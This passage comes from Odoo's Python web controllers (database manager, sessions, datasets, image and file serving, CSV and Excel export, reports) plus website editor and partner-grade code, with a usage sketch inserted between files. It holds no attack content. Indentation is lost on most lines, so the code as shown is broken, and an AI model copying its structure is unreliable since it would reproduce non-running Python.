return http.local_redirect('/web/database/manager')
except Exception as e:
error = "Database duplication error: %s" % (str(e) or repr(e))
return self._render_template(error=error)
@http.route('/web/database/drop', type='http', auth="none", methods=['POST'], csrf=False)
def drop(self, master_pwd, name):
try:
dispatch_rpc('db','drop', [master_pwd, name])
request._cr = None # dropping a database leads to an unusable cursor
return http.local_redirect('/web/database/manager')
except Exception as e:
error = "Database deletion error: %s" % (str(e) or repr(e))
return self._render_template(error=error)
@http.route('/web/database/backup', type='http', auth="none", methods=['POST'], csrf=False)
def backup(self, master_pwd, name, backup_format = 'zip'):
try:
odoo.service.db.check_super(master_pwd)
ts = datetime.datetime.utcnow().strftime("%Y-%m-%d_%H-%M-%S")
filename = "%s_%s.%s" % (name, ts, backup_format)
headers = [
('Content-Type', 'application/octet-stream; charset=binary'),
('Content-Disposition', content_disposition(filename)),
]
dump_stream = odoo.service.db.dump_db(name, None, backup_format)
response = werkzeug.wrappers.Response(dump_stream, headers=headers, direct_passthrough=True)
return response
except Exception as e:
_logger.exception('Database.backup')
error = "Database backup error: %s" % (str(e) or repr(e))
return self._render_template(error=error)
@http.route('/web/database/restore', type='http', auth="none", methods=['POST'], csrf=False)
def restore(self, master_pwd, backup_file, name, copy=False):
try:
data_file = None
db.check_super(master_pwd)
with tempfile.NamedTemporaryFile(delete=False) as data_file:
backup_file.save(data_file)
db.restore_db(name, data_file.name, str2bool(copy))
return http.local_redirect('/web/database/manager')
except Exception as e:
error = "Database restore error: %s" % (str(e) or repr(e))
return self._render_template(error=error)
finally:
if data_file:
os.unlink(data_file.name)
@http.route('/web/database/change_password', type='http', auth="none", methods=['POST'], csrf=False)
def change_password(self, master_pwd, master_pwd_new):
try:
dispatch_rpc('db', 'change_admin_password', [master_pwd, master_pwd_new])
return http.local_redirect('/web/database/manager')
except Exception as e:
error = "Master password update error: %s" % (str(e) or repr(e))
return self._render_template(error=error)
@http.route('/web/database/list', type='json', auth='none')
def list(self):
"""
        Used by the mobile application for listing the available databases
:return: List of databases
:rtype: list
"""
return http.db_list()
class Session(http.Controller):
@http.route('/web/session/get_session_info', type='json', auth="none")
def get_session_info(self):
request.session.check_security()
request.uid = request.session.uid
request.disable_db = False
return request.env['ir.http'].session_info()
@http.route('/web/session/authenticate', type='json', auth="none")
def authenticate(self, db, login, password, base_location=None):
request.session.authenticate(db, login, password)
return request.env['ir.http'].session_info()
@http.route('/web/session/change_password', type='json', auth="user")
def change_password(self, fields):
        old_password, new_password, confirm_password = operator.itemgetter('old_pwd', 'new_password', 'confirm_pwd')(
            {f['name']: f['value'] for f in fields})
        if not (old_password.strip() and new_password.strip() and confirm_password.strip()):
            return {'error': _('You cannot leave any password empty.'), 'title': _('Change Password')}
        if new_password != confirm_password:
            return {'error': _('The new password and its confirmation must be identical.'), 'title': _('Change Password')}
msg = _("Error, password not changed !")
try:
if request.env['res.users'].change_password(old_password, new_password):
return {'new_password':<PASSWORD>}
except UserError as e:
msg = e.name
except AccessDenied as e:
msg = e.args[0]
if msg == AccessDenied().args[0]:
msg = _('The old password you provided is incorrect, your password was not changed.')
return {'title': _('Change Password'), 'error': msg}
@http.route('/web/session/get_lang_list', type='json', auth="none")
def get_lang_list(self):
try:
return dispatch_rpc('db', 'list_lang', []) or []
except Exception as e:
return {"error": e, "title": _("Languages")}
@http.route('/web/session/modules', type='json', auth="user")
def modules(self):
# return all installed modules. Web client is smart enough to not load a module twice
return module_installed(environment=request.env(user=odoo.SUPERUSER_ID))
@http.route('/web/session/save_session_action', type='json', auth="user")
def save_session_action(self, the_action):
"""
        This method stores an action object in the session and returns an integer
        identifying that action. The method get_session_action() can be used to get
        back the action.
:param the_action: The action to save in the session.
:type the_action: anything
:return: A key identifying the saved action.
:rtype: integer
"""
return request.session.save_action(the_action)
@http.route('/web/session/get_session_action', type='json', auth="user")
def get_session_action(self, key):
"""
        Gets back a previously saved action. This method can return None if the action
        was saved too long ago (this case should be handled in a smart way).
:param key: The key given by save_session_action()
:type key: integer
:return: The saved action or None.
:rtype: anything
"""
return request.session.get_action(key)
@http.route('/web/session/check', type='json', auth="user")
def check(self):
request.session.check_security()
return None
@http.route('/web/session/account', type='json', auth="user")
def account(self):
ICP = request.env['ir.config_parameter'].sudo()
params = {
'response_type': 'token',
'client_id': ICP.get_param('database.uuid') or '',
'state': json.dumps({'d': request.db, 'u': ICP.get_param('web.base.url')}),
'scope': 'userinfo',
}
return 'https://accounts.odoo.com/oauth2/auth?' + werkzeug.url_encode(params)
@http.route('/web/session/destroy', type='json', auth="user")
def destroy(self):
request.session.logout()
@http.route('/web/session/logout', type='http', auth="none")
def logout(self, redirect='/web'):
request.session.logout(keep_db=True)
return werkzeug.utils.redirect(redirect, 303)
class DataSet(http.Controller):
@http.route('/web/dataset/search_read', type='json', auth="user")
def search_read(self, model, fields=False, offset=0, limit=False, domain=None, sort=None):
return self.do_search_read(model, fields, offset, limit, domain, sort)
    def do_search_read(self, model, fields=False, offset=0, limit=False, domain=None, sort=None):
""" Performs a search() followed by a read() (if needed) using the
provided search criteria
:param str model: the name of the model to search on
:param fields: a list of the fields to return in the result records
:type fields: [str]
:param int offset: from which index should the results start being returned
:param int limit: the maximum number of records to return
:param list domain: the search domain for the query
:param list sort: sorting directives
        :returns: A structure (dict) with two keys: length (the total number of
                  records matching the domain) and records (the paginated records
                  matching the fields selection set)
        :rtype: dict
"""
Model = request.env[model]
records = Model.search_read(domain, fields,
offset=offset or 0, limit=limit or False, order=sort or False)
if not records:
return {
'length': 0,
'records': []
}
if limit and len(records) == limit:
length = Model.search_count(domain)
else:
length = len(records) + (offset or 0)
return {
'length': length,
'records': records
}
@http.route('/web/dataset/load', type='json', auth="user")
def load(self, model, id, fields):
value = {}
r = request.env[model].browse([id]).read()
if r:
value = r[0]
return {'value': value}
def call_common(self, model, method, args, domain_id=None, context_id=None):
return self._call_kw(model, method, args, {})
def _call_kw(self, model, method, args, kwargs):
check_method_name(method)
return call_kw(request.env[model], method, args, kwargs)
@http.route('/web/dataset/call', type='json', auth="user")
def call(self, model, method, args, domain_id=None, context_id=None):
return self._call_kw(model, method, args, {})
@http.route(['/web/dataset/call_kw', '/web/dataset/call_kw/<path:path>'], type='json', auth="user")
def call_kw(self, model, method, args, kwargs, path=None):
return self._call_kw(model, method, args, kwargs)
@http.route('/web/dataset/call_button', type='json', auth="user")
def call_button(self, model, method, args, domain_id=None, context_id=None):
action = self._call_kw(model, method, args, {})
if isinstance(action, dict) and action.get('type') != '':
return clean_action(action)
return False
@http.route('/web/dataset/resequence', type='json', auth="user")
def resequence(self, model, ids, field='sequence', offset=0):
""" Re-sequences a number of records in the model, by their ids
The re-sequencing starts at the first model of ``ids``, the sequence
number is incremented by one after each record and starts at ``offset``
:param ids: identifiers of the records to resequence, in the new sequence order
:type ids: list(id)
:param str field: field used for sequence specification, defaults to
"sequence"
:param int offset: sequence number for first record in ``ids``, allows
starting the resequencing from an arbitrary number,
defaults to ``0``
"""
m = request.env[model]
if not m.fields_get([field]):
return False
# python 2.6 has no start parameter
for i, record in enumerate(m.browse(ids)):
record.write({field: i + offset})
return True
class View(http.Controller):
@http.route('/web/view/edit_custom', type='json', auth="user")
def edit_custom(self, custom_id, arch):
"""
Edit a custom view
:param int custom_id: the id of the edited custom view
:param str arch: the edited arch of the custom view
:returns: dict with acknowledged operation (result set to True)
"""
custom_view = request.env['ir.ui.view.custom'].browse(custom_id)
custom_view.write({ 'arch': arch })
return {'result': True}
class Binary(http.Controller):
def placeholder(self, image='placeholder.png'):
addons_path = http.addons_manifest['web']['addons_path']
return open(os.path.join(addons_path, 'web', 'static', 'src', 'img', image), 'rb').read()
def force_contenttype(self, headers, contenttype='image/png'):
dictheaders = dict(headers)
dictheaders['Content-Type'] = contenttype
return list(dictheaders.items())
@http.route(['/web/content',
'/web/content/<string:xmlid>',
'/web/content/<string:xmlid>/<string:filename>',
'/web/content/<int:id>',
'/web/content/<int:id>/<string:filename>',
'/web/content/<int:id>-<string:unique>',
'/web/content/<int:id>-<string:unique>/<string:filename>',
'/web/content/<int:id>-<string:unique>/<path:extra>/<string:filename>',
'/web/content/<string:model>/<int:id>/<string:field>',
'/web/content/<string:model>/<int:id>/<string:field>/<string:filename>'], type='http', auth="public")
def content_common(self, xmlid=None, model='ir.attachment', id=None, field='datas',
filename=None, filename_field='datas_fname', unique=None, mimetype=None,
download=None, data=None, token=None, access_token=None, related_id=None, access_mode=None,
**kw):
status, headers, content = binary_content(
xmlid=xmlid, model=model, id=id, field=field, unique=unique, filename=filename,
filename_field=filename_field, download=download, mimetype=mimetype,
access_token=access_token, related_id=related_id, access_mode=access_mode)
if status == 304:
response = werkzeug.wrappers.Response(status=status, headers=headers)
elif status == 301:
return werkzeug.utils.redirect(content, code=301)
elif status != 200:
response = request.not_found()
else:
content_base64 = base64.b64decode(content)
headers.append(('Content-Length', len(content_base64)))
response = request.make_response(content_base64, headers)
if token:
response.set_cookie('fileToken', token)
return response
@http.route(['/web/image',
'/web/image/<string:xmlid>',
'/web/image/<string:xmlid>/<string:filename>',
'/web/image/<string:xmlid>/<int:width>x<int:height>',
'/web/image/<string:xmlid>/<int:width>x<int:height>/<string:filename>',
'/web/image/<string:model>/<int:id>/<string:field>',
'/web/image/<string:model>/<int:id>/<string:field>/<string:filename>',
'/web/image/<string:model>/<int:id>/<string:field>/<int:width>x<int:height>',
'/web/image/<string:model>/<int:id>/<string:field>/<int:width>x<int:height>/<string:filename>',
'/web/image/<int:id>',
'/web/image/<int:id>/<string:filename>',
'/web/image/<int:id>/<int:width>x<int:height>',
'/web/image/<int:id>/<int:width>x<int:height>/<string:filename>',
'/web/image/<int:id>-<string:unique>',
'/web/image/<int:id>-<string:unique>/<string:filename>',
'/web/image/<int:id>-<string:unique>/<int:width>x<int:height>',
'/web/image/<int:id>-<string:unique>/<int:width>x<int:height>/<string:filename>'], type='http', auth="public")
def content_image(self, xmlid=None, model='ir.attachment', id=None, field='datas',
filename_field='datas_fname', unique=None, filename=None, mimetype=None,
download=None, width=0, height=0, crop=False, related_id=None, access_mode=None,
access_token=None, avoid_if_small=False, upper_limit=False, signature=False, **kw):
status, headers, content = binary_content(
xmlid=xmlid, model=model, id=id, field=field, unique=unique, filename=filename,
filename_field=filename_field, download=download, mimetype=mimetype,
default_mimetype='image/png', related_id=related_id, access_mode=access_mode, access_token=access_token)
if status == 304:
return werkzeug.wrappers.Response(status=304, headers=headers)
elif status == 301:
return werkzeug.utils.redirect(content, code=301)
elif status != 200 and download:
return request.not_found()
if headers and dict(headers).get('Content-Type', '') == 'image/svg+xml': # we shan't resize svg images
height = 0
width = 0
else:
height = int(height or 0)
width = int(width or 0)
if not content:
content = base64.b64encode(self.placeholder(image='placeholder.png'))
headers = self.force_contenttype(headers, contenttype='image/png')
if not (width or height):
suffix = field.split('_')[-1]
if suffix in ('small', 'medium', 'big'):
content = getattr(odoo.tools, 'image_resize_image_%s' % suffix)(content)
if crop and (width or height):
content = crop_image(content, type='center', size=(width, height), ratio=(1, 1))
elif (width or height):
if not upper_limit:
# resize maximum 500*500
if width > 500:
width = 500
if height > 500:
height = 500
content = odoo.tools.image_resize_image(base64_source=content, size=(width or None, height or None),
encoding='base64', upper_limit=upper_limit,
avoid_if_small=avoid_if_small)
image_base64 = base64.b64decode(content)
headers.append(('Content-Length', len(image_base64)))
response = request.make_response(image_base64, headers)
response.status_code = status
return response
# backward compatibility
@http.route(['/web/binary/image'], type='http', auth="public")
def content_image_backward_compatibility(self, model, id, field, resize=None, **kw):
width = None
height = None
if resize:
width, height = resize.split(",")
return self.content_image(model=model, id=id, field=field, width=width, height=height)
@http.route('/web/binary/upload', type='http', auth="user")
@serialize_exception
def upload(self, callback, ufile):
# TODO: might be useful to have a configuration flag for max-length file uploads
out = """<script language="javascript" type="text/javascript">
var win = window.top.window;
win.jQuery(win).trigger(%s, %s);
</script>"""
try:
data = ufile.read()
args = [len(data), ufile.filename,
ufile.content_type, base64.b64encode(data)]
except Exception as e:
args = [False, str(e)]
return out % (json.dumps(callback), json.dumps(args))
@http.route('/web/binary/upload_attachment', type='http', auth="user")
@serialize_exception
def upload_attachment(self, callback, model, id, ufile):
files = request.httprequest.files.getlist('ufile')
Model = request.env['ir.attachment']
out = """<script language="javascript" type="text/javascript">
var win = window.top.window;
win.jQuery(win).trigger(%s, %s);
</script>"""
args = []
for ufile in files:
filename = ufile.filename
if request.httprequest.user_agent.browser == 'safari':
# Safari sends NFD UTF-8 (where é is composed by 'e' and [accent])
# we need to send it the same stuff, otherwise it'll fail
filename = unicodedata.normalize('NFD', ufile.filename)
try:
attachment = Model.create({
'name': filename,
'datas': base64.encodestring(ufile.read()),
'datas_fname': filename,
'res_model': model,
'res_id': int(id)
})
attachment._post_add_create()
except Exception:
args.append({'error': _("Something horrible happened")})
_logger.exception("Fail to upload attachment %s" % ufile.filename)
else:
args.append({
'filename': filename,
'mimetype': ufile.content_type,
'id': attachment.id
})
return out % (json.dumps(callback), json.dumps(args))
@http.route([
'/web/binary/company_logo',
'/logo',
'/logo.png',
], type='http', auth="none", cors="*")
def company_logo(self, dbname=None, **kw):
imgname = 'logo'
imgext = '.png'
placeholder = functools.partial(get_resource_path, 'web', 'static', 'src', 'img')
uid = None
if request.session.db:
dbname = request.session.db
uid = request.session.uid
elif dbname is None:
dbname = db_monodb()
if not uid:
uid = odoo.SUPERUSER_ID
if not dbname:
response = http.send_file(placeholder(imgname + imgext))
else:
try:
# create an empty registry
registry = odoo.modules.registry.Registry(dbname)
with registry.cursor() as cr:
company = int(kw['company']) if kw and kw.get('company') else False
if company:
cr.execute("""SELECT logo_web, write_date
FROM res_company
WHERE id = %s
""", (company,))
else:
cr.execute("""SELECT c.logo_web, c.write_date
FROM res_users u
LEFT JOIN res_company c
ON c.id = u.company_id
WHERE u.id = %s
""", (uid,))
row = cr.fetchone()
if row and row[0]:
image_base64 = base64.b64decode(row[0])
image_data = io.BytesIO(image_base64)
mimetype = guess_mimetype(image_base64, default='image/png')
imgext = '.' + mimetype.split('/')[1]
if imgext == '.svg+xml':
imgext = '.svg'
response = http.send_file(image_data, filename=imgname + imgext, mimetype=mimetype, mtime=row[1])
else:
response = http.send_file(placeholder('nologo.png'))
except Exception:
response = http.send_file(placeholder(imgname + imgext))
return response
class Action(http.Controller):
@http.route('/web/action/load', type='json', auth="user")
def load(self, action_id, additional_context=None):
Actions = request.env['ir.actions.actions']
value = False
try:
action_id = int(action_id)
except ValueError:
try:
action = request.env.ref(action_id)
assert action._name.startswith('ir.actions.')
action_id = action.id
except Exception:
action_id = 0 # force failed read
base_action = Actions.browse([action_id]).read(['type'])
if base_action:
ctx = dict(request.context)
action_type = base_action[0]['type']
if action_type == 'ir.actions.report':
ctx.update({'bin_size': True})
if additional_context:
ctx.update(additional_context)
request.context = ctx
action = request.env[action_type].browse([action_id]).read()
if action:
value = clean_action(action[0])
return value
@http.route('/web/action/run', type='json', auth="user")
def run(self, action_id):
result = request.env['ir.actions.server'].browse([action_id]).run()
return clean_action(result) if result else False
class Export(http.Controller):
@http.route('/web/export/formats', type='json', auth="user")
def formats(self):
""" Returns all valid export formats
        :returns: for each export format, a dict with its identifier (``tag``),
                  printable name (``label``) and an optional ``error`` message
        :rtype: [dict]
"""
return [
{'tag': 'xls', 'label': 'Excel', 'error': None if xlwt else "XLWT 1.3.0 required"},
{'tag': 'csv', 'label': 'CSV'},
]
def fields_get(self, model):
Model = request.env[model]
fields = Model.fields_get()
return fields
@http.route('/web/export/get_fields', type='json', auth="user")
def get_fields(self, model, prefix='', parent_name= '',
import_compat=True, parent_field_type=None,
parent_field=None, exclude=None):
if import_compat and parent_field_type in ['many2one', 'many2many']:
fields = self.fields_get(model)
fields = {k: v for k, v in fields.items() if k in ['id', 'name']}
else:
fields = self.fields_get(model)
if not import_compat:
fields['.id'] = fields.pop('id', {'string': 'ID'})
else:
fields['id']['string'] = _('External ID')
if parent_field:
parent_field['string'] = _('External ID')
fields['id'] = parent_field
fields_sequence = sorted(fields.items(),
key=lambda field: (field[0] not in ['id', '.id', 'display_name', 'name'], odoo.tools.ustr(field[1].get('string', ''))))
records = []
for field_name, field in fields_sequence:
if import_compat and not field_name == 'id':
if exclude and field_name in exclude:
continue
if field.get('readonly'):
# If none of the field's states unsets readonly, skip the field
if all(dict(attrs).get('readonly', True)
for attrs in field.get('states', {}).values()):
continue
if not field.get('exportable', True):
continue
            id = prefix + (prefix and '/' or '') + field_name
if field_name == 'name' and import_compat and parent_field_type in ['many2one', 'many2many']:
# Add name field when expand m2o and m2m fields in import-compatible mode
id = prefix
name = parent_name + (parent_name and '/' or '') + field['string']
record = {'id': id, 'string': name,
'value': id, 'children': False,
'field_type': field.get('type'),
'required': field.get('required'),
'relation_field': field.get('relation_field')}
records.append(record)
if len(id.split('/')) < 3 and 'relation' in field:
ref = field.pop('relation')
record['value'] += '/id'
record['params'] = {'model': ref, 'prefix': id, 'name': name, 'parent_field': field}
record['children'] = True
return records
@http.route('/web/export/namelist', type='json', auth="user")
def namelist(self, model, export_id):
# TODO: namelist really has no reason to be in Python (although itertools.groupby helps)
export = request.env['ir.exports'].browse([export_id]).read()[0]
export_fields_list = request.env['ir.exports.line'].browse(export['export_fields']).read()
fields_data = self.fields_info(
model, [f['name'] for f in export_fields_list])
return [
{'name': field['name'], 'label': fields_data[field['name']]}
for field in export_fields_list
]
def fields_info(self, model, export_fields):
info = {}
fields = self.fields_get(model)
if ".id" in export_fields:
fields['.id'] = fields.get('id', {'string': 'ID'})
# To make fields retrieval more efficient, fetch all sub-fields of a
# given field at the same time. Because the order in the export list is
# arbitrary, this requires ordering all sub-fields of a given field
# together so they can be fetched at the same time
#
# Works the following way:
# * sort the list of fields to export, the default sorting order will
# put the field itself (if present, for xmlid) and all of its
# sub-fields right after it
# * then, group on: the first field of the path (which is the same for
        #   a field and for its subfields) and the length of splitting on the
# first '/', which basically means grouping the field on one side and
# all of the subfields on the other. This way, we have the field (for
# the xmlid) with length 1, and all of the subfields with the same
# base but a length "flag" of 2
# * if we have a normal field (length 1), just add it to the info
# mapping (with its string) as-is
# * otherwise, recursively call fields_info via graft_subfields.
# all graft_subfields does is take the result of fields_info (on the
# field's model) and prepend the current base (current field), which
# rebuilds the whole sub-tree for the field
#
# result: because we're not fetching the fields_get for half the
# database models, fetching a namelist with a dozen fields (including
# relational data) falls from ~6s to ~300ms (on the leads model).
# export lists with no sub-fields (e.g. import_compatible lists with
# no o2m) are even more efficient (from the same 6s to ~170ms, as
# there's a single fields_get to execute)
for (base, length), subfields in itertools.groupby(
sorted(export_fields),
lambda field: (field.split('/', 1)[0], len(field.split('/', 1)))):
subfields = list(subfields)
if length == 2:
# subfields is a seq of $base/*rest, and not loaded yet
info.update(self.graft_subfields(
fields[base]['relation'], base, fields[base]['string'],
subfields
))
elif base in fields:
info[base] = fields[base]['string']
return info
def graft_subfields(self, model, prefix, prefix_string, fields):
export_fields = [field.split('/', 1)[1] for field in fields]
return (
(prefix + '/' + k, prefix_string + '/' + v)
for k, v in self.fields_info(model, export_fields).items())
class ExportFormat(object):
raw_data = False
@property
def content_type(self):
""" Provides the format's content type """
raise NotImplementedError()
def filename(self, base):
""" Creates a valid filename for the format (with extension) from the
        provided base name (extension-less)
"""
raise NotImplementedError()
def from_data(self, fields, rows):
""" Conversion method from Odoo's export data to whatever the
current export class outputs
        :param list fields: a list of fields to export
        :param list rows: a list of records to export
:returns:
:rtype: bytes
"""
raise NotImplementedError()
def base(self, data, token):
params = json.loads(data)
model, fields, ids, domain, import_compat = \
operator.itemgetter('model', 'fields', 'ids', 'domain', 'import_compat')(params)
Model = request.env[model].with_context(import_compat=import_compat, **params.get('context', {}))
records = Model.browse(ids) or Model.search(domain, offset=0, limit=False, order=False)
if not Model._is_an_ordinary_table():
fields = [field for field in fields if field['name'] != 'id']
field_names = [f['name'] for f in fields]
import_data = records.export_data(field_names, self.raw_data).get('datas',[])
if import_compat:
columns_headers = field_names
else:
columns_headers = [val['label'].strip() for val in fields]
return request.make_response(self.from_data(columns_headers, import_data),
headers=[('Content-Disposition',
content_disposition(self.filename(model))),
('Content-Type', self.content_type)],
cookies={'fileToken': token})
class CSVExport(ExportFormat, http.Controller):
@http.route('/web/export/csv', type='http', auth="user")
@serialize_exception
def index(self, data, token):
return self.base(data, token)
@property
def content_type(self):
return 'text/csv;charset=utf8'
def filename(self, base):
return base + '.csv'
def from_data(self, fields, rows):
fp = io.BytesIO()
writer = pycompat.csv_writer(fp, quoting=1)
writer.writerow(fields)
for data in rows:
row = []
for d in data:
# Spreadsheet apps tend to detect formulas on leading =, + and -
if isinstance(d, pycompat.string_types) and d.startswith(('=', '-', '+')):
d = "'" + d
row.append(pycompat.to_text(d))
writer.writerow(row)
return fp.getvalue()
class ExcelExport(ExportFormat, http.Controller):
# Excel needs raw data to correctly handle numbers and date values
raw_data = True
@http.route('/web/export/xls', type='http', auth="user")
@serialize_exception
def index(self, data, token):
return self.base(data, token)
@property
def content_type(self):
return 'application/vnd.ms-excel'
def filename(self, base):
return base + '.xls'
def from_data(self, fields, rows):
if len(rows) > 65535:
raise UserError(_('There are too many rows (%s rows, limit: 65535) to export as Excel 97-2003 (.xls) format. Consider splitting the export.') % len(rows))
workbook = xlwt.Workbook()
worksheet = workbook.add_sheet('Sheet 1')
for i, fieldname in enumerate(fields):
worksheet.write(0, i, fieldname)
worksheet.col(i).width = 8000 # around 220 pixels
base_style = xlwt.easyxf('align: wrap yes')
date_style = xlwt.easyxf('align: wrap yes', num_format_str='YYYY-MM-DD')
datetime_style = xlwt.easyxf('align: wrap yes', num_format_str='YYYY-MM-DD HH:mm:SS')
for row_index, row in enumerate(rows):
for cell_index, cell_value in enumerate(row):
cell_style = base_style
if isinstance(cell_value, bytes) and not isinstance(cell_value, pycompat.string_types):
# because xls uses raw export, we can get a bytes object
# here. xlwt does not support bytes values in Python 3 ->
# assume this is base64 and decode to a string, if this
# fails note that you can't export
try:
cell_value = pycompat.to_text(cell_value)
except UnicodeDecodeError:
raise UserError(_("Binary fields can not be exported to Excel unless their content is base64-encoded. That does not seem to be the case for %s.") % fields[cell_index])
if isinstance(cell_value, pycompat.string_types):
cell_value = re.sub("\r", " ", pycompat.to_text(cell_value))
# Excel supports a maximum of 32767 characters in each cell:
cell_value = cell_value[:32767]
elif isinstance(cell_value, datetime.datetime):
cell_style = datetime_style
elif isinstance(cell_value, datetime.date):
cell_style = date_style
worksheet.write(row_index + 1, cell_index, cell_value, cell_style)
fp = io.BytesIO()
workbook.save(fp)
fp.seek(0)
data = fp.read()
fp.close()
return data
class Apps(http.Controller):
@http.route('/apps/<app>', auth='user')
def get_app_url(self, req, app):
try:
record = request.env.ref('base.open_module_tree')
action = record.read(['name', 'type', 'res_model', 'view_mode', 'view_type', 'context', 'views', 'domain'])[0]
action['target'] = 'current'
except ValueError:
action = False
try:
app_id = request.env.ref('base.module_%s' % app).id
except ValueError:
app_id = False
if action and app_id:
action['res_id'] = app_id
action['view_mode'] = 'form'
action['views'] = [(False, u'form')]
sakey = Session().save_session_action(action)
debug = '?debug' if req.debug else ''
return werkzeug.utils.redirect('/web{0}#sa={1}'.format(debug, sakey))
class ReportController(http.Controller):
#------------------------------------------------------
# Report controllers
#------------------------------------------------------
@http.route([
'/report/<converter>/<reportname>',
'/report/<converter>/<reportname>/<docids>',
], type='http', auth='user', website=True)
def report_routes(self, reportname, docids=None, converter=None, **data):
report = request.env['ir.actions.report']._get_report_from_name(reportname)
context = dict(request.env.context)
if docids:
docids = [int(i) for i in docids.split(',')]
if data.get('options'):
data.update(json.loads(data.pop('options')))
if data.get('context'):
# Ignore 'lang' here, because the context in data is the one from the webclient *but* if
            # the user explicitly wants to change the lang, this mechanism overwrites it.
data['context'] = json.loads(data['context'])
if data['context'].get('lang'):
del data['context']['lang']
context.update(data['context'])
if converter == 'html':
html = report.with_context(context).render_qweb_html(docids, data=data)[0]
return request.make_response(html)
elif converter == 'pdf':
pdf = report.with_context(context).render_qweb_pdf(docids, data=data)[0]
pdfhttpheaders = [('Content-Type', 'application/pdf'), ('Content-Length', len(pdf))]
return request.make_response(pdf, headers=pdfhttpheaders)
elif converter == 'text':
text = report.with_context(context).render_qweb_text(docids, data=data)[0]
texthttpheaders = [('Content-Type', 'text/plain'), ('Content-Length', len(text))]
return request.make_response(text, headers=texthttpheaders)
else:
raise werkzeug.exceptions.HTTPException(description='Converter %s not implemented.' % converter)
#------------------------------------------------------
# Misc. route utils
#------------------------------------------------------
@http.route(['/report/barcode', '/report/barcode/<type>/<path:value>'], type='http', auth="public")
def report_barcode(self, type, value, width=600, height=100, humanreadable=0):
"""Contoller able to render barcode images thanks to reportlab.
Samples:
<img t-att-src="'/report/barcode/QR/%s' % o.name"/>
<img t-att-src="'/report/barcode/?type=%s&value=%s&width=%s&height=%s' %
('QR', o.name, 200, 200)"/>
:param type: Accepted types: 'Codabar', 'Code11', 'Code128', 'EAN13', 'EAN8', 'Extended39',
'Extended93', 'FIM', 'I2of5', 'MSI', 'POSTNET', 'QR', 'Standard39', 'Standard93',
'UPCA', 'USPS_4State'
:param humanreadable: Accepted values: 0 (default) or 1. 1 will insert the readable value
at the bottom of the output image
"""
try:
barcode = request.env['ir.actions.report'].barcode(type, value, width=width, height=height, humanreadable=humanreadable)
except (ValueError, AttributeError):
raise werkzeug.exceptions.HTTPException(description='Cannot convert into barcode.')
return request.make_response(barcode, headers=[('Content-Type', 'image/png')])
@http.route(['/report/download'], type='http', auth="user")
def report_download(self, data, token):
"""This function is used by 'action_manager_report.js' in order to trigger the download of
a pdf/controller report.
        :param data: a JSON.stringified javascript array containing the report internal url ([0])
                     and the report type ([1])
:returns: Response with a filetoken cookie and an attachment header
"""
requestcontent = json.loads(data)
url, type = requestcontent[0], requestcontent[1]
try:
if type in ['qweb-pdf', 'qweb-text']:
converter = 'pdf' if type == 'qweb-pdf' else 'text'
extension = 'pdf' if type == 'qweb-pdf' else 'txt'
pattern = '/report/pdf/' if type == 'qweb-pdf' else '/report/text/'
reportname = url.split(pattern)[1].split('?')[0]
docids = None
if '/' in reportname:
reportname, docids = reportname.split('/')
if docids:
# Generic report:
response = self.report_routes(reportname, docids=docids, converter=converter)
else:
# Particular report:
data = url_decode(url.split('?')[1]).items() # decoding the args represented in JSON
response = self.report_routes(reportname, converter=converter, **dict(data))
report = request.env['ir.actions.report']._get_report_from_name(reportname)
filename = "%s.%s" % (report.name, extension)
if docids:
ids = [int(x) for x in docids.split(",")]
obj = request.env[report.model].browse(ids)
if report.print_report_name and not len(obj) > 1:
report_name = safe_eval(report.print_report_name, {'object': obj, 'time': time})
filename = "%s.%s" % (report_name, extension)
response.headers.add('Content-Disposition', content_disposition(filename))
response.set_cookie('fileToken', token)
return response
else:
return
except Exception as e:
se = _serialize_exception(e)
error = {
'code': 200,
'message': "Odoo Server Error",
'data': se
}
return request.make_response(html_escape(json.dumps(error)))
@http.route(['/report/check_wkhtmltopdf'], type='json', auth="user")
def check_wkhtmltopdf(self):
return request.env['ir.actions.report'].get_wkhtmltopdf_state()
```
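A minimal usage sketch for the JSON controllers above (`Session.authenticate` and `DataSet.search_read`). This is illustrative only: the base URL, database, credentials and model are placeholder assumptions, and the JSON-RPC 2.0 envelope is the convention that Odoo's `type='json'` routes normally expect, not anything defined in this file.
```python
# Hedged sketch: authenticate against /web/session/authenticate, then call
# /web/dataset/search_read. BASE_URL, DB, LOGIN, PASSWORD and the model are placeholders.
import requests

BASE_URL = "http://localhost:8069"
DB, LOGIN, PASSWORD = "mydb", "admin", "admin"

def json_call(session, path, params):
    # type='json' routes expect a JSON-RPC 2.0 envelope and answer with {'result': ...}
    payload = {"jsonrpc": "2.0", "method": "call", "params": params, "id": 1}
    response = session.post(BASE_URL + path, json=payload)
    response.raise_for_status()
    return response.json().get("result")

session = requests.Session()
# authenticate() sets the session cookie reused by the following calls
json_call(session, "/web/session/authenticate",
          {"db": DB, "login": LOGIN, "password": PASSWORD})
# search_read mirrors do_search_read(): a dict with 'length' and 'records'
result = json_call(session, "/web/dataset/search_read",
                   {"model": "res.partner", "fields": ["name"], "domain": [], "limit": 5})
print(result["length"], [r["name"] for r in result["records"]])
```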
#### File: website/controllers/web_editor.py
```python
from odoo.addons.web_editor.controllers.main import Web_Editor
from odoo.http import request
class Web_Editor(Web_Editor):
def _get_view_fields_to_read(self):
res = super(Web_Editor, self)._get_view_fields_to_read()
res.append('website_id')
return res
def save_scss_view_hook(self):
res = super(Web_Editor, self).save_scss_view_hook()
website = request.env['website'].get_current_website()
if website:
res['website_id'] = website.id
return res
def save_scss_attachment_hook(self):
res = super(Web_Editor, self).save_scss_attachment_hook()
website = request.env['website'].get_current_website()
if website:
res['website_id'] = website.id
return res
def get_custom_attachment(self, custom_url, op='='):
website = request.env['website'].get_current_website()
res = super(Web_Editor, self).get_custom_attachment(custom_url, op=op)
return res.with_context(website_id=website.id).filtered(lambda x: not x.website_id or x.website_id == website)
def get_custom_view(self, custom_url, op='='):
website = request.env['website'].get_current_website()
res = super(Web_Editor, self).get_custom_view(custom_url, op=op)
return res.with_context(website_id=website.id).filter_duplicate()
```
#### File: website_crm_partner_assign/models/res_partner.py
```python
from odoo import api, fields, models
from odoo.addons.http_routing.models.ir_http import slug
class ResPartnerGrade(models.Model):
_name = 'res.partner.grade'
_inherit = ['website.published.mixin']
_description = 'Partner Grade'
website_published = fields.Boolean(default=True)
sequence = fields.Integer('Sequence')
active = fields.Boolean('Active', default=lambda *args: 1)
name = fields.Char('Level Name', translate=True)
partner_weight = fields.Integer('Level Weight', default=1,
help="Gives the probability to assign a lead to this partner. (0 means no assignation.)")
@api.multi
def _compute_website_url(self):
super(ResPartnerGrade, self)._compute_website_url()
for grade in self:
